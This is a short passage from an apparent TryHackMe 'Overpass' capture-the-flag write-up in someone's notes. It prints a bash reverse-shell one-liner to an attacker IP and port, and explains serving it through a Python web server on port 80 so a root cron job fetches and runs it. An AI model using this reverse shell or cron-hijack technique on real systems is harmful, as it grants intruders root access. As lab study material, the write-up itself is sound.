Eidolon123/Notes/digital_garden/Hacking/write_ups/TryHackMe/overpass.md

 bash -i >& /dev/tcp/10.11.47.218/4444 0>&1
 ```

+Here we set up the python server, using port 80 as cron will request the default port.

 ![[python_server.png]]

 Then on a listener we set up earlier, we have a root shell!